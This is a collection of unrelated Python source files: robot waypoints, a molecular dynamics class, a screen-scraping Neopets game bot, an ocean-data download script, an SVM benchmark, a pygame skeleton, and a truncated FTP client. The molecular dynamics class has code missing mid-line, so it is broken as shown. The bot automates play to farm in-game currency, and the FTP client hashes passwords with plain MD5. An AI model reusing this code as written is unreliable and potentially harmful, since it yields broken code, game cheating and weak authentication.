{"seq_id":"165140682","text":"\n\nfrom point import *\nfrom orientation import *\n\n#MAP LOCATIONS:\n\n#ROOM 2:\n\n#Position = (x, y) = (-4.41, 3.57)\n#Orientation = (z, w) = (0.98, 0.19)\n\n# Goal points\n\nROOM1 = (Point(-4.31, 0.22), Orientation(0.990, 0.144))\nROOM2 = (Point(-3.29, 3.87), Orientation(0.982, 0.189))\nROOM3 = (Point(-3.59, 7.07), Orientation(0.954, 0.301))\nKITCHEN1 = (Point(0, -0.83), Orientation(-0.06, 0.998))\nKITCHEN2 = (Point(0.05, -0.12), Orientation(-0.239, 0.971))\nAFTER_PR2 = (Point(0.03, 0.57), Orientation(1, 0))\n\n# Waypoints\n\nPR2 = (Point(1.1, -0.49), Orientation(0.801, 0.598))\n\nROOM1_ENTRANCE = (Point(-2, 0.05), Orientation(1, 0))\nROOM1_EXIT = (Point(-2, -0.44), Orientation(0, 1))\nROOM1_HALLWAY = (Point(-1.33, 0.16), Orientation(-0.281, 0.960))\n#ROOM1_SPECIAL = (Point(), Orientation())\n\nROOM2_ENTRANCE = (Point(-1.88, 3.60), Orientation(1, 0))\nROOM2_EXIT = (Point(-1.95, 2.57), Orientation(-0.646, 0.763))\nROOM2_HALLWAY = (Point(-1.35, 3.32), Orientation(0.702, 0.712))\n\nROOM3_ENTRANCE = (Point(-2.11, 6.67), Orientation(1, 0))\nROOM3_EXIT = (Point(-1.97, 5.53), Orientation(-0.640, 0.769))\nROOM3_HALLWAY = (Point(-1.21, 6.02), Orientation(0.828, 0.560)) #x,y = -1.53, 6.77\n\n\n# PATHS\nPATH_WAYPOSES = {}\nPATH_WAYPOSES[(\"room1\", \"room2\")] = [ROOM1_EXIT, ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"room1\", \"room3\")] = [ROOM1_EXIT, ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\nPATH_WAYPOSES[(\"room1\", \"kitchen1\")] = [ROOM1_EXIT, ROOM1_HALLWAY, KITCHEN1]\nPATH_WAYPOSES[(\"room1\", \"kitchen2\")] = [ROOM1_EXIT, ROOM1_HALLWAY, KITCHEN2]\n\nPATH_WAYPOSES[(\"room2\", \"room1\")] = [ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"room2\", \"room3\")] = [ROOM2_EXIT, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\nPATH_WAYPOSES[(\"room2\", \"kitchen1\")] = [ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN1]\nPATH_WAYPOSES[(\"room2\", \"kitchen2\")] = [ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN2]\n\nPATH_WAYPOSES[(\"room3\", \"room1\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"room3\", 
\"room2\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"room3\", \"kitchen1\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN1]\nPATH_WAYPOSES[(\"room3\", \"kitchen2\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN2]\n\nPATH_WAYPOSES[(\"kitchen\", \"after_pr2\")] = [PR2, AFTER_PR2]\nPATH_WAYPOSES[(\"kitchen\", \"room1\")] = [ROOM1_HALLWAY, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"kitchen\", \"room2\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"kitchen\", \"room3\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\n\nPATH_WAYPOSES[(\"pr2\", \"after_pr2\")] = [AFTER_PR2]\n\nPATH_WAYPOSES[(\"after_pr2\", \"room1\")] = [ROOM1_HALLWAY, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"after_pr2\", \"room2\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"after_pr2\", \"room3\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\n\n\n#ROOM1_POSITION = {\"donatello\" : Point(0, 0), \"leonardo\" : Point(0, 0)}\n#ROOM1_ORIENTATION = {\"donatello\" : Orientation(0, 1), \"leonardo\" : Orientation(0, 1)}\n\n#ROOM2_POSITION = {\"donatello\" : (0, 0), \"leonardo\" : (0, 0)}\n#ROOM2_ORIENTATION = {\"donatello\" : Orientation(0, 1), \"leonardo\" : Orientation(0, 1)}\n\n#KITCHEN_POSITION = {\"donatello\" : (1.79, -0.57), \"leonardo\" : (1.25, -1.03)}\n#KITCHEN_ORIENTATION = {\"donatello\" : Orientation(0.9, 0.44), \"leonardo\" : Orientation(0.78, 0.63)}\n\n#PR2_POSITION = {\"donatello\" : (0.83, 0.44), \"leonardo\" : (0, 0)}\n#PR2_ORIENTATION = {\"donatello\" : Orientation(-0.63, 0.77), \"leonardo\" : Orientation(0, 1)}\n\n\n\n","sub_path":"src/waiter_locations.py","file_name":"waiter_locations.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"304247163","text":"import time\nimport numpy as np\nfrom TensorMol import *\nimport pickle\nimport random\nfrom ..Neuralnetwork import *\nfrom ..Comparm import GPARAMS\nfrom ..Base import *\nfrom ..MD import *\n\nfrom sys import stdout\nimport copy\nfrom parmed.amber import AmberParm\nfrom parmed.amber import AmberMdcrd\nfrom parmed.amber import Rst7\nfrom simtk.openmm import *\nfrom simtk.openmm.app import *\nfrom simtk.unit import *\nfrom .NNcal import*\nfrom .DFTBcal import * \nfrom .Basestruc import *\nfrom ..Comparm import *\n\nclass FullQM_System_Amber:\n def __init__(self,prmname='',crdname='',Path='./',Inpath='./',Name=\"\"):\n self.prmname=prmname\n self.crdname=crdname \n self.name=Name\n self.qmcutoff=GPARAMS.Compute_setting.Qmradius\n self.Theroylevel=GPARAMS.Compute_setting.Theroylevel\n self.Path=Path\n if not os.path.exists(self.Path):\n os.system(\"mkdir %s\"%self.Path)\n self.Inpath=Inpath\n if not os.path.exists(self.Inpath):\n os.system(\"mkdir %s\"%self.Inpath)\n self.step=0\n self.err_step=0\n self.Get_prmtop_info()\n if self.crdname!='':\n self.Get_init_coord()\n self.FullMMparm=copy.deepcopy(self.prmtop)\n mmsys=self.FullMMparm.createSystem(nonbondedMethod=NoCutoff,rigidWater=False)\n integrator=LangevinIntegrator(300*kelvin,1/picosecond,0.00001*picoseconds)\n self.MMsimulation=Simulation(self.FullMMparm.topology,mmsys,integrator)\n def Get_init_coord(self):\n self.coords=coords_from_rst7_AMBER(self.crdname,self.natom)\n def Get_prmtop_info(self):\n self.prmtop=AmberParm(self.prmname)\n self.natom=len(self.prmtop.atoms)\n self.nres=len(self.prmtop.residues)\n 
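# read atom names, element numbers and partial charges from the prmtop data tables\n        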
atomname=self.prmtop.parm_data[\"ATOM_NAME\"]\n eleindex=self.prmtop.parm_data['ATOMIC_NUMBER']\n atomcrg=self.prmtop.parm_data['CHARGE']\n self.totalcharge=round(np.sum(atomcrg))\n self.atoms=np.array(eleindex)\n self.respts=np.array(self.prmtop.parm_data['RESIDUE_POINTER'])-1\n respte=self.prmtop.parm_data['RESIDUE_POINTER'][1:]\n respte.append(self.natom+1)\n self.respte=np.array(respte)-2\n self.rescrg=np.zeros(self.nres) \n for i in range(self.nres):\n self.rescrg[i]=round(np.sum(atomcrg[self.respts[i]:self.respte[i]+1]))\n print (self.rescrg)\n def Create_DisMap(self):\n d1=np.zeros((self.natom,self.natom),dtype=float)\n np.fill_diagonal(d1,0.00000000001)\n self.Dgraph=tf.Graph()\n with self.Dgraph.as_default():\n self.tfcrd=tf.placeholder(shape=[self.natom,3],dtype=tf.float64,name='coordinate')\n self.tfR=tf.reshape(tf.reduce_sum(self.tfcrd*self.tfcrd,1),[-1,1])\n self.tfDM=tf.sqrt(self.tfR-2*tf.matmul(self.tfcrd,tf.transpose(self.tfcrd))\\\n +tf.transpose(self.tfR)+tf.constant(d1))\n self.Dsess=tf.Session(graph=self.Dgraph)\n \n def Update_DisMap(self):\n self.Distance_Matrix=self.Dsess.run(self.tfDM,{self.tfcrd:self.coords})\n return \n\n def Cal_EFQ(self):\n self.step+=1\n self.force=np.zeros((self.natom,3))\n self.energy=0\n self.charge=np.zeros(self.natom)\n EGCMlist=[]\n QMMol=Molnew(self.atoms,self.coords,self.totalcharge)\n self.QMMol=QMMol\n try:\n #if True:\n EGCM=(QMMol.Cal_EGCM()-GPARAMS.Esoinn_setting.scalemin)/(GPARAMS.Esoinn_setting.scalemax-GPARAMS.Esoinn_setting.scalemin)\n EGCM[ ~ np.isfinite( EGCM )] = 0\n EGCMlist.append(EGCM)\n #QMMol.belongto=self.ESOINN_MODEL.find_closest_cluster(GPARAMS.Train_setting.Modelnumperpoint,EGCM)\n if GPARAMS.Esoinn_setting.Model.class_id200:\n positions=np.array(self.coords)\n self.MMsimulation.context.setPositions(positions/10)\n self.MMstate=self.MMsimulation.context.getState(getEnergy=True,getForces=True,getPositions=True)\n self.energy=self.MMstate.getPotentialEnergy().value_in_unit(kilocalories_per_mole)\n self.force=self.MMstate.getForces(asNumpy=True).value_in_unit(kilocalories/(angstrom*mole)) \n self.recorderr=0\n AVG_ERR=999\n self.stepmethod=\"Amber\"\n ERROR_str=''\n ERROR_mols.append([QMMol,999])\n else:\n self.recorderr=AVG_ERR\n self.force=Predict[0][1]\n self.energy=Predict[0][0]\n if len(ERROR_mols)>0 and self.step-self.err_step>5:\n self.err_step=self.step\n else:\n ERROR_mols=[]\n EGCMlist=[]\n return self.force/627.51*JOULEPERHARTREE,self.energy/627.51,AVG_ERR,ERROR_mols,EGCMlist,\"\" \n def update_crd(self):\n pass\n\n","sub_path":"build/lib/ESOI_HDNN_MD/Computemethod/Allqm_amber.py","file_name":"Allqm_amber.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106257584","text":"import PIL.ImageGrab\nimport cv2\nimport sys\nimport time\nimport win32api\nimport win32con\n\n\n# The grid for the second level of Ghoul Catchers is 6 x 6 squares.\n# Each square is 40 x 40 pixels; therefore the grid is 240 x 240 pixels.\nSQUARE_LENGTH = 40\nGRID_LENGTH = 240\n\n# A list of reference images that will be used to classify each ghoul.\n# Each square will have its histogram compared with the histograms of\n# each reference image.\nIMAGE_FOLDER = 'ghouls/'\nIMAGE_FILENAMES = [\n 'chompie.png',\n 'franky.png',\n 'pinkie.png',\n 'slimy.png',\n 'ugly.png',\n 'wobbie.png'\n]\n\n\n\"\"\"\nMove the mouse cursor to (x, y) and perform a left click.\n@see https://stackoverflow.com/a/1181538\n\"\"\"\ndef click(x, y):\n 
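# move the cursor to (x, y), then synthesize a left-button press and release there\n    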
win32api.SetCursorPos((x, y))\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, x, y, 0, 0)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, x, y, 0, 0)\n\n\n\"\"\"\nGenerate a histogram for an image.\n\"\"\"\ndef generate_histogram(path):\n image = cv2.imread(path)\n histogram = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\n histogram = cv2.normalize(histogram, histogram).flatten()\n\n return histogram\n\n\n\"\"\"\nRead the state of the game board.\n\"\"\"\ndef get_board(x, y):\n # Compute the histograms for each reference image.\n IMAGE_HISTOGRAMS = dict()\n for filename in IMAGE_FILENAMES:\n image = cv2.imread(IMAGE_FOLDER + filename)\n IMAGE_HISTOGRAMS[filename] = generate_histogram(IMAGE_FOLDER + filename)\n\n # Read the state of the game board.\n board = []\n for col in range(0, 6):\n board.append([])\n for row in range(0, 6):\n\n # Compute the bounding box for the square.\n box = (\n x + row * SQUARE_LENGTH,\n y + col * SQUARE_LENGTH,\n x + (row + 1) * SQUARE_LENGTH,\n y + (col + 1) * SQUARE_LENGTH\n )\n\n # Screenshot the image of the square.\n # Generate a histogram.\n PIL.ImageGrab.grab(box).save('square.png')\n histogram = generate_histogram('square.png')\n\n # Compare the square histogram and the reference histograms.\n results = dict()\n for (ghoul, ref_histogram) in IMAGE_HISTOGRAMS.items():\n results[ghoul] = cv2.compareHist(histogram, ref_histogram, cv2.HISTCMP_CORREL)\n\n # Classify the ghoul by taking the ghoul with highest correlation.\n results = sorted([(v, k) for (k, v) in results.items()], reverse=True)\n board[col].append(results[0][1])\n\n return board\n\n\n\"\"\"\nGet the next move.\n\"\"\"\ndef get_move(board):\n for row in range(0, 6):\n for col in range(0, 3):\n\n # A A B A pattern (horizontal)\n if board[row][col] == board[row][col + 1] and \\\n board[row][col] == board[row][col + 3]:\n return col + 2, row, col + 3, row\n\n # A B A A pattern (horizontal)\n if board[row][col] != board[row][col + 1] and \\\n board[row][col] == board[row][col + 2] and \\\n board[row][col] == board[row][col + 3]:\n return col, row, col + 1, row\n\n # A A B A pattern (vertical)\n if board[col][row] == board[col + 1][row] and \\\n board[col][row] == board[col + 3][row]:\n return row, col + 2, row, col + 3\n\n # A B A A pattern (vertical)\n if board[col][row] != board[col + 1][row] and \\\n board[col][row] == board[col + 2][row] and \\\n board[col][row] == board[col + 3][row]:\n return row, col, row, col + 1\n\n for row in range(0, 5):\n for col in range(0, 4):\n\n # A _ A pattern\n # _ A _ (horizontal)\n if board[row][col] == board[row][col + 2] and \\\n board[row][col] == board[row + 1][col + 1]:\n return col + 1, row, col + 1, row + 1\n\n # _ A _ pattern\n # A _ A (horizontal)\n if board[row][col + 1] == board[row + 1][col] and \\\n board[row][col + 1] == board[row + 1][col + 2]:\n return col + 1, row, col + 1, row + 1\n\n # A _ _ pattern\n # _ A A (horizontal)\n if board[row][col] == board[row + 1][col + 1] and \\\n board[row][col] == board[row + 1][col + 2]:\n return col, row, col, row + 1\n\n # _ A A pattern\n # A _ _ (horizontal)\n if board[row + 1][col] == board[row][col + 1] and \\\n board[row + 1][col] == board[row][col + 2]:\n return col, row, col, row + 1\n\n # _ _ A pattern\n # A A _ (horizontal)\n if board[row][col + 2] == board[row + 1][col] and \\\n board[row][col + 2] == board[row + 1][col + 1]:\n return col + 2, row, col + 2, row + 1\n\n # A A _ pattern\n # _ _ A (horizontal)\n if board[row + 1][col + 2] == board[row][col] and 
\\\n board[row + 1][col + 2] == board[row][col + 1]:\n return col + 2, row, col + 2, row + 1\n\n # A _ A pattern\n # _ A _ (vertical)\n if board[col][row] == board[col + 2][row] and \\\n board[col][row] == board[col + 1][row + 1]:\n return row, col + 1, row + 1, col + 1\n\n # _ A _ pattern\n # A _ A (vertical)\n if board[col + 1][row] == board[col][row + 1] and \\\n board[col + 1][row] == board[col + 2][row + 1]:\n return row, col + 1, row + 1, col + 1\n\n # A _ _ pattern\n # _ A A (vertical)\n if board[col][row] == board[col + 1][row + 1] and \\\n board[col][row] == board[col + 2][row + 1]:\n return row, col, row + 1, col\n\n # _ A A pattern\n # A _ _ (vertical)\n if board[col][row + 1] == board[col + 1][row] and \\\n board[col][row + 1] == board[col + 2][row]:\n return row, col, row + 1, col\n\n # _ _ A pattern\n # A A _ (vertical)\n if board[col + 2][row] == board[col][row + 1] and \\\n board[col + 2][row] == board[col + 1][row + 1]:\n return row, col + 2, row + 1, col + 2\n\n # A A _ pattern\n # _ _ A (vertical)\n if board[col + 2][row + 1] == board[col][row] and \\\n board[col + 2][row + 1] == board[col + 1][row]:\n return row, col + 2, row + 1, col + 2\n\n\n\"\"\"\nGhoul Catchers bot entry point.\n\"\"\"\ndef main():\n # 1. Start Ghoul Catchers, login to Neopets, and begin level 2.\n # Do this before executing this bot.\n print(' ┍━━━━━━━━━━━━━━━━━━━━━━━━━━━┑')\n print(' │ Nuttywhal\\'s Ghoul Catcher │')\n print(' ┕━━━━━━━━━━━━━━━━━━━━━━━━━━━┙')\n print()\n print(' (1) Open Ghoul Catchers in Bluestacks.')\n print(' (2) Login to your Neopets account.')\n print(' (3) Start the second level.')\n print(' (4) Move your mouse cursor to the top-left of the 6x6 grid.')\n print()\n input(' Press the enter key to continue...')\n print()\n print(' Starting in ', end='')\n\n for i in range(5, 0, -1):\n time.sleep(1)\n print(str(i) + '.. ', end='')\n sys.stdout.flush()\n\n print()\n print()\n\n # 2. Execute this bot with the mouse cursor hovered over the top-left\n # corner of the game board.\n x, y = win32api.GetCursorPos()\n\n # 3. Let the bot do its thing. 
Enjoy your 50k NP!\n for game in range(100):\n print('Playing game #' + str(game) + '...')\n\n for move in range(0, 8):\n\n # Get the next move.\n board = get_board(x, y)\n x1, y1, x2, y2 = get_move(board)\n\n # Make move.\n click(x + x1 * SQUARE_LENGTH + 20,\n y + y1 * SQUARE_LENGTH + 20)\n time.sleep(1.5)\n click(x + x2 * SQUARE_LENGTH + 20,\n y + y2 * SQUARE_LENGTH + 20)\n time.sleep(5)\n\n # Click on restart button to restart the level.\n time.sleep(5)\n click(x + 125, y + 200)\n\n # Wait for the level to load.\n time.sleep(20)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bots/neopets/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"312780764","text":"import re\nimport datetime\nimport time\nimport glob, os, shutil\nimport subprocess\nimport h5py\nimport numpy as np\n\ndirpath = os.getcwd()\n\ninput_file = \"CMEMS_BIO2HDF5.dat\"\n\ndownload_dir = (dirpath+\"\\CMEMS_Download\")\nConvertToHdf5_dir = (dirpath+\"\\ConvertToHdf5\")\n\nbackup_path = (dirpath+\"\\Backup\")\n\n#####################################################\ndef read_date():\n\tglobal initial_date, initial_date_download\n\tglobal end_date, end_date_download\n\t#global number_of_runs\n\tglobal forecast_mode\n\t\n\tforecast_mode = 0\n\trefday_to_start = 0\n\t\n\twith open(input_file) as file:\n\t\tfor line in file:\n\t\t\tif re.search(\"^FORECAST_MODE.+:\", line):\n\t\t\t\tnumber = line.split()\n\t\t\t\tforecast_mode = int(number[2])\n\t\t\t\t\n\tif forecast_mode == 1:\n\t\twith open(input_file) as file:\n\t\t\tfor line in file:\n\t\t\t\tif re.search(\"^REFDAY_TO_START.+:\", line):\n\t\t\t\t\tnumber = line.split()\n\t\t\t\t\trefday_to_start = int(number[2])\n\t\t\t\t\t\n\t\tinitial_date_download = datetime.datetime.now() - datetime.timedelta(days = 11 - refday_to_start)\n\t\tend_date_download = datetime.datetime.now() + datetime.timedelta(days = 7)\n \t\t\t\t\t\t\n\telse:\n\t\twith open(input_file) as file:\n\t\t\tfor line in file:\n\t\t\t\tif re.search(\"^START.+:\", line):\n\t\t\t\t\tnumber = line.split()\n\t\t\t\t\tinitial_date = datetime.datetime(int(number[2]),int(number[3]),int(number[4]),int(number[5]),int(number[6]),int(number[7]))\n\t\t\t\telif re.search(\"^END.+:\", line):\n\t\t\t\t\tnumber = line.split()\n\t\t\t\t\tend_date = datetime.datetime(int(number[2]),int(number[3]),int(number[4]),int(number[5]),int(number[6]),int(number[7]))\n\t\t\t\n\t\tinitial_date_download = initial_date - datetime.timedelta(days = 7)\n\t\tend_date_download = end_date\n\t\t\n\t# with open(input_file) as file:\n\t\t# for line in file:\n\t\t\t# if re.search(\"^START.+:\", line):\n\t\t\t\t# words = line.split()\n\t\t\t\t# initial_date = datetime.datetime(int(words[2]),int(words[3]),int(words[4]),int(words[5]),int(words[6]),int(words[7]))\n\t\t\t# elif re.search(\"^END.+:\", line):\n\t\t\t\t# words = line.split()\n\t\t\t\t# end_date = datetime.datetime(int(words[2]),int(words[3]),int(words[4]),int(words[5]),int(words[6]),int(words[7]))\n\t\t\t\t\t\n\t#interval = end_date - initial_date\n\t\n\t#number_of_runs = interval.days/7\n#####################################################\n#def next_date (run):\n#\tglobal next_start_date\n#\tglobal next_end_date\n\t\t\n#\tnext_start_date = initial_date + datetime.timedelta(days = run*7)\n#\tnext_end_date = initial_date + datetime.timedelta(days = run*7+7)\n\n#####################################################\ndef write_date(file_name):\n\t\t\n\twith 
open(file_name) as file:\n\t\tfile_lines = file.readlines()\n\t\t\n\tnumber_of_lines = len(file_lines)\n\t\n\tfor n in range(0,number_of_lines):\n\t\tline = file_lines[n]\t\t\n\t\tif re.search(\"^START.+:\", line):\n\t\t\t#file_lines[n] = \"START \" + \": \" + str(next_start_date.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\t#file_lines[n] = \"START \" + \": \" + str(initial_date_download.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\tfile_lines[n] = \"START \" + \": \" + str(initial_date_download.strftime(\"%Y %m %d \")) + \"12 0 0\" + \"\\n\"\n\n\n\t\telif re.search(\"^END.+:\", line):\t\n\t\t\t#file_lines[n] = \"END \" + \": \" + str(next_end_date.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\t#file_lines[n] = \"END \" + \": \" + str(end_date_download.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\tfile_lines[n] = \"END \" + \": \" + str(end_date_download.strftime(\"%Y %m %d \")) + \"12 0 0\" + \"\\n\"\n\t\t\t\n\twith open(file_name,\"w\") as file:\n\t\tfor n in range(0,number_of_lines) :\n\t\t\tfile.write(file_lines[n])\n\n#####################################################\n\nread_date()\n\n#for run in range (0,number_of_runs):\t\n\t\n#Update dates\n#next_date (run)\n\n#Download\nos.chdir(download_dir)\n\nfiles = glob.glob(\"*.nc\")\nfor filename in files:\n\tos.remove(filename)\n\t\nfile_name = \"CMEMS_BIO_DOWNLOAD.DAT\"\nwrite_date(file_name)\t\noutput = subprocess.call([\"CMEMS_BIO_DOWNLOAD.bat\"])\n\nnc_files = glob.iglob(os.path.join(download_dir,\"*.nc\"))\nfor file in nc_files:\n\tshutil.copy(file, ConvertToHdf5_dir)\n\n\t\n#ConvertToHdf5\nos.chdir(ConvertToHdf5_dir)\n\nfiles = glob.glob(\"*.hdf*\")\nfor filename in files:\n\tos.remove(filename)\n\t\noutput = subprocess.call([\"ConvertToHdf5.bat\"])\n\nif forecast_mode == 1:\n\toutput_dir = backup_path\n\t\n\tif not os.path.exists(output_dir):\n\t\tos.makedirs(output_dir)\n\n\thdf_files = glob.iglob(os.path.join(ConvertToHdf5_dir,\"*.hdf*\"))\n\tfor file in hdf_files:\n\t\tshutil.copy(file, output_dir)\n\n\tfiles = glob.glob(\"*.nc\")\n\tfor filename in files:\n\t\tos.remove(filename)\n\t\t\n\thdf5path = (os.path.join(output_dir,\"Plataforma_SE_Bio.hdf5\"))\n\n\thdf = h5py.File(hdf5path, 'r+')\n\tgroup = hdf[\"Time\"]\n\tTime = group[\"Time_00002\"].value\n\n\thdf_enddate = datetime.datetime(int(Time[0]),int(Time[1]),int(Time[2]),int(Time[3]),int(Time[4]),int(Time[5])) \n\n\thdf_enddate_plus7 = hdf_enddate + datetime.timedelta(days = 7)\n\n\t#Time = [\"{:.3E}\".format(int(hdf_enddate_plus7.strftime(\"%Y\"))) , \"{:.3E}\".format(int(hdf_enddate_plus7.strftime(\"%m\"))),\"{:.3E}\".format(int(hdf_enddate_plus7.strftime(\"%d\"))),\"{:.3E}\".format(int(12)),\"{:.3E}\".format(int(0)),\"{:.3E}\".format(int(0))]\n\n\tdata = hdf[\"Time/Time_00002\"]\n\tdata[...] 
= (int(hdf_enddate_plus7.strftime(\"%Y\")), int(hdf_enddate_plus7.strftime(\"%m\")), int(hdf_enddate_plus7.strftime(\"%d\")), 12, 0, 0 )\n\n\thdf.close()\n\nelse:\n\t#output_dir = backup_path+\"\\\\\"+str(next_start_date.strftime(\"%Y\"))+\"\\\\\"+str(next_start_date.strftime(\"%m\"))+\"\\\\\"+str(next_start_date.strftime(\"%Y%m%d\")) + \"_\" + str(next_end_date.strftime(\"%Y%m%d\"))\n\toutput_dir = backup_path+\"\\\\\"+\"\\\\\"+str(initial_date.strftime(\"%Y%m%d\")) + \"_\" + str(end_date.strftime(\"%Y%m%d\"))\n\t\n\tif not os.path.exists(output_dir):\n\t\tos.makedirs(output_dir)\n\n\thdf_files = glob.iglob(os.path.join(ConvertToHdf5_dir,\"*.hdf*\"))\n\tfor file in hdf_files:\n\t\tshutil.copy(file, output_dir)\n\n\tfiles = glob.glob(\"*.nc\")\n\tfor filename in files:\n\t\tos.remove(filename)","sub_path":"Aplica_OP/Work/CMEMS/GLOBAL_ANALYSIS_FORECAST_BIO/CMEMS_BIO2HDF5.py","file_name":"CMEMS_BIO2HDF5.py","file_ext":"py","file_size_in_byte":5739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491699411","text":"from svm_pegasos import SVMPegasos\nimport numpy as np\nimport sys\nimport time\nfrom os.path import isfile\n\n\ndef read_file(filename):\n assert isfile(filename)\n data = np.genfromtxt(filename, delimiter=',')\n print('successfully loaded', filename)\n return data\n\n\ndef myPegasos(filename, k, numruns):\n numruns = int(numruns)\n k = int(k)\n assert(numruns > 0 and k > 0)\n data = read_file(filename)\n X = data[:, 1:]\n y = data[:, 0]\n time_array = np.zeros(numruns)\n loss_list = []\n\n print(numruns, 'runs on', k, 'data points')\n for i in range(numruns):\n print('run ', i + 1, \"/\", numruns, \", please wait...\", end=\"\\r\")\n begin = time.time()\n model = SVMPegasos(X, y, k)\n loss_list.append(model.loss_record)\n end = time.time()\n time_array[i] = end - begin\n\n time_avg = np.mean(time_array)\n time_std = np.std(time_array, ddof=1)\n print('------')\n print('average runtime for ', numruns, ' runs with minibatch size of ', k, ':', round(time_avg, 3), 'seconds')\n print('SD of run time for ', numruns, ' runs with minibatch size of ', k, ':', round(time_std, 3), 'seconds')\n\n\ndef main(argv=sys.argv):\n if len(argv) == 4:\n myPegasos(*argv[1:])\n else:\n print('Usage: python3 ./my_pegasos.py /path/to/dataset.csv k numruns', file=sys.stderr)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"HW2/code/my_pegasos.py","file_name":"my_pegasos.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561894724","text":"''' main file for game '''\n\n# import libraries + files\nimport pygame as pg\n#import random\nimport settings\n#import sprites\n\nclass Main:\n ''' main class for our game '''\n def __init__(self):\n ''' setup pygame '''\n pg.init() \n pg.mixer.init()\n self.screen = pg.display.set_mode((settings.WIDTH, settings.HEIGHT))\n pg.display.set_caption(settings.TITLE)\n self.clock = pg.time.Clock()\n self.running = True\n\n # variables used within other methods\n self.all_sprites = None\n self.playing = None\n\n def new(self):\n ''' create a new game '''\n self.all_sprites = pg.sprite.Group()\n self.run()\n\n def run(self):\n ''' game loop '''\n self.playing = True\n while self.playing:\n self.clock.tick(settings.FPS)\n self.events()\n self.update()\n self.draw()\n\n def update(self):\n ''' game loop - update '''\n self.all_sprites.update()\n\n\n def events(self):\n ''' game loop - events '''\n for 
event in pg.event.get():\n            if event.type == pg.QUIT:\n                if self.playing:\n                    self.playing = False\n                self.running = False\n\n    def draw(self):\n        ''' game loop - draw '''\n        self.screen.fill(settings.BLACK)\n        self.all_sprites.draw(self.screen)\n        pg.display.flip()\n\n    def show_start_screen(self):\n        ''' start-screen for game '''\n\n    def show_go_screen(self):\n        ''' game-over screen for game '''\n\ndef game():\n    ''' method for creating instance of Game '''\n    g = Main()\n    g.show_start_screen()\n    while g.running:\n        g.new()\n        g.show_go_screen()\n    pg.quit()\n\n\n\nif __name__ == '__main__':\n    game()\n","sub_path":"justice_league_game/part_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"259034016","text":"# -*- coding: UTF-8 -*-\nimport socket\nimport os\nimport json\nimport hashlib\nimport sys\n\n\nclass FtpClient(object):\n\n    # variable storing the current working directory\n    work_path = ''\n    # print(work_path)\n\n    def __init__(self):\n        self.client = socket.socket()\n        self.authentication = False  # whether the user is logged in\n\n    def help(self):  # print the command reference\n        msg = '''\n        ls - list all files and folders in the current directory\n        pwd - show the current working directory\n        cd - cd . stay in the current working directory\n             cd .. go up to the parent directory\n             cd dirname switch to the dirname directory under the current one\n\n        get - get filename download a file\n        put - put G:/ftp/home/***.txt upload a file\n        mkdir - mkdir dirname create a directory\n        '''\n        print(msg)\n\n    def connect(self, ip, port):\n        self.client.connect((ip, port))\n\n    def interactive(self):\n        # interactive loop\n        while True:\n            cmd = input(\"[root@ftp_server %s]$:\" % (self.work_path.split(os.sep)[-1])).strip()\n            if len(cmd) == 0:\n                continue\n            cmd_str = cmd.split()[0]\n            # dispatch via reflection\n            if hasattr(self, 'cmd_%s' % cmd_str):\n                func = getattr(self, 'cmd_%s' % cmd_str)\n                func(cmd)  # execute the command\n\n            else:\n                self.help()\n\n    def authenticate(self):\n        # login authentication\n        while True:\n            account_name = input('please enter the username:').strip()\n            account_passwd = input('please enter the password:').strip()\n            account_m = hashlib.md5()\n            account_m.update(account_passwd.encode('utf-8'))\n            passwd_md5 = 